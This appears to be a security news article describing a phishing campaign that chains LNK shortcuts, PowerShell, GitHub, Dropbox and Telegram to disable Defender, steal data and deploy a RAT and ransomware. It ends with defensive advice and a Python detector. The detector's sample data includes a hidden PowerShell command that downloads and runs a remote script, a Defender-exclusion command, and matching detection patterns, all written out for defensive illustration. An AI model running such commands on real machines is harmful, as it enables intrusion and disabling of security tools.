High-level Phishing: the multi-stage campaign that uses GitHub, Dropbox and Telegram to take control of Windows and encrypt your files

Published · 6 min read · 233 reads

In recent weeks, researchers have detected a sophisticated phishing campaign aimed at users in Russia that combines social deception with several payload stages to obtain total control of the machine and, in many cases, to encrypt its files. The operation uses documents that look administrative, access to public cloud services and techniques that seek to disable native Windows defenses, which makes it a clear example of how attackers chain legitimate tools and services to evade blocking. For the technical analysis and specific examples, see the Fortinet FortiGuard Labs report documenting the infection flow: Inside a multi-stage Windows malware campaign.

The attack begins with a classic but effective hook: a compressed file containing harmless-looking documents and a Windows shortcut (LNK) with a Russian name designed to look like a .txt. That shortcut hides a PowerShell command that downloads a script from a public repository on GitHub. Using services such as GitHub for scripts and Dropbox for binaries makes the infrastructure resistant to rapid takedown, because splitting functions across public platforms complicates the response by providers and security teams.


The first script to run acts as a lightweight loader: it hides the PowerShell window so that the user does not notice any activity, drops a visible decoy copy to maintain the illusion and, in the meantime, notifies the operator through the Telegram Bot API. This notification signals that the initial phase completed without errors and that the attacker can continue with the later stages. Showing the victim a legitimate document while silently performing malicious actions in the background is a social tactic that reduces the likelihood that the victim will stop the attack.

After a deliberate delay, the loader retrieves and runs a heavily obfuscated Visual Basic file that builds the next payload directly in memory. Assembling the code in memory avoids leaving artifacts on disk and defeats many traditional detection tools. If the payload does not have high privileges, the code pesters the user with User Account Control prompts until elevation is granted; once it has administrative privileges, it proceeds to disable defenses and lock down the environment to prevent detection and recovery.

The measures the malware applies are varied and worrying: it modifies Microsoft Defender exclusions and settings, disables additional protection components using PowerShell, uses a utility called Defendnot to register a fake security product with the Windows Security Center and thereby cause Defender to deactivate, and alters registry policies to disable administrative and diagnostic tools. Microsoft advises enabling Tamper Protection and monitoring unusual changes in the service to mitigate abuse of this API; its technical recommendations are available in the Microsoft knowledge base: Microsoft Defender vs Defendnot.

In addition to neutralizing defenses, the actor downloads additional modules that collect information and exfiltrate it. A .NET module takes regular screenshots and sends them via Telegram; other components extract credentials stored in browsers, cryptocurrency wallets and applications such as Discord, Steam or Telegram, and can also record microphone audio, webcam images and clipboard content. One of the final artifacts is a remote-access Trojan known as Amnesia RAT, retrieved from Dropbox, which provides total remote control: process listing and termination, command execution, deployment of additional payloads and data exfiltration via HTTPS or through external hosting services. Fortinet describes these capabilities in detail in its technical analysis: see Fortinet report.

The threat is not limited to espionage: after rendering the system's defense tools inert, the attackers deploy a ransomware variant derived from the Hakuna Matata family that encrypts documents, source code, images and other assets. Before encryption, processes that could interfere with its operation are terminated and, silently, the ransomware monitors the clipboard to replace cryptocurrency addresses with others controlled by the attackers. The end result on many machines is loss of access to critical information and, in some cases, an additional lockout of the user interface through a WinLocker component.

In parallel, response teams have observed related campaigns using different techniques and tools but with similar objectives. For example, the operation called DupeHike, attributed to the UNG0902 actor and documented by Seqrite Labs, uses decoys themed around payroll and internal policies to induce execution of an implant called DUPERUNNER, which in turn downloads the AdaptixC2 framework. There have also been campaigns by an actor known as Paper Werewolf or GOFFEE that used AI-generated lures and Excel XLL add-ins to deliver the EchoGather backdoor; Intezer explained that chain and its use of WinHTTP for C2 communication: Intezer analysis.


What can organizations and users do about this kind of campaign? There is no single solution, but several practices reduce the risk. The first line of defense is to prevent automatic execution of code from documents and shortcuts that arrive by email, and to set policies that restrict PowerShell and scripting on workstations that do not need them. It is important to enable integrity mechanisms in the antivirus, such as the tamper protection offered by modern solutions, and to apply application controls that block binaries from running out of temporary or user-writable locations. Network segmentation and the separation of privileged accounts, together with offline backups of critical data, reduce the impact if mass encryption occurs. Microsoft and other vendors publish specific guidance for mitigating platform abuse along with operational recommendations, and security teams should review these resources and alerts regularly.

If an organization suspects that it has been compromised by this family of threats, immediate actions should include isolating affected hosts to cut off exfiltration, collecting volatile evidence carefully so as not to destroy traces, rotating credentials, and notifying the relevant regulatory and banking entities if financial data has been at risk. A tested response plan and collaboration with security service providers can speed up recovery. To understand the specific abuse of Defendnot and how to detect it, teams can refer to the Binary Defense analysis and to response materials published by EDR and SOC providers: Defendnot: turning Windows Defender against itself.

The technical and operational lesson of these incidents is clear: modern attackers achieve full compromises without exploiting software flaws, relying instead on abuse of legitimate system functionality and cloud services. Countering this requires combining technology with processes and training: a user who receives a ZIP containing an LNK should not open it by default, and administrators should monitor changes to security policies and the telemetry indicators that betray unauthorized PowerShell execution, connections to unusual public repositories, or traffic to messaging and file-hosting services from workstations that never use them. Visibility, prevention and a response plan are the best defense against these complex attack chains.
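The indicators listed above can be correlated per host rather than alerted on one at a time. The following Python is an added example written for this article, not code from Fortinet or any vendor: it runs a few rules over constructed, Sysmon-like telemetry (the field names and the EXAMPLE repository path are assumptions) and flags a host only when several distinct links of the described chain appear together, which keeps a lone hidden PowerShell window or a single Dropbox download from paging anyone.

```python
import re
from collections import defaultdict

# Constructed sample telemetry; field names are an assumption, not any vendor's schema.
EVENTS = [
    {"host": "ws01", "type": "process", "image": "powershell.exe",
     "cmdline": "powershell.exe -WindowStyle Hidden -c "
                "IEX (iwr https://raw.githubusercontent.com/EXAMPLE/stage1.ps1)"},
    {"host": "ws01", "type": "network", "image": "powershell.exe", "dest": "api.telegram.org"},
    {"host": "ws01", "type": "process", "image": "powershell.exe",
     "cmdline": "powershell.exe -c Add-MpPreference -ExclusionPath C:\\Users\\Public"},
    {"host": "ws01", "type": "network", "image": "wscript.exe", "dest": "dl.dropboxusercontent.com"},
    {"host": "ws02", "type": "process", "image": "powershell.exe",
     "cmdline": "powershell.exe -c Get-Date"},   # benign admin use, should not be flagged
]

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}

# One rule per link of the chain described in the article; all match case-insensitively.
CMDLINE_RULES = {
    "hidden_window":   re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "github_download": re.compile(r"(?:iwr|invoke-webrequest|downloadstring).*github", re.I),
    "defender_tamper": re.compile(r"(?:add|set)-mppreference", re.I),
}
NETWORK_RULES = {
    "telegram_beacon": re.compile(r"api\.telegram\.org$", re.I),
    "dropbox_payload": re.compile(r"dropbox(?:usercontent)?\.com$", re.I),
}

def match_rules(event):
    """Return the set of rule names a single event satisfies."""
    hits = set()
    if event["type"] == "process":
        hits.update(n for n, rx in CMDLINE_RULES.items() if rx.search(event.get("cmdline", "")))
    elif event["type"] == "network" and event["image"].lower() in SCRIPT_HOSTS:
        # Only script hosts talking to these services are interesting; a browser is not.
        hits.update(n for n, rx in NETWORK_RULES.items() if rx.search(event.get("dest", "")))
    return hits

def score_hosts(events):
    """Map each host to the sorted list of distinct chain links observed on it."""
    seen = defaultdict(set)
    for ev in events:
        seen[ev["host"]] |= match_rules(ev)
    return {h: sorted(r) for h, r in seen.items()}

def suspicious_hosts(events, threshold=3):
    """Hosts on which at least `threshold` distinct links of the chain were seen."""
    return sorted(h for h, r in score_hosts(events).items() if len(r) >= threshold)
```

With the constructed events, ws01 trips all five rules and is reported, while ws02's routine PowerShell use trips none.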
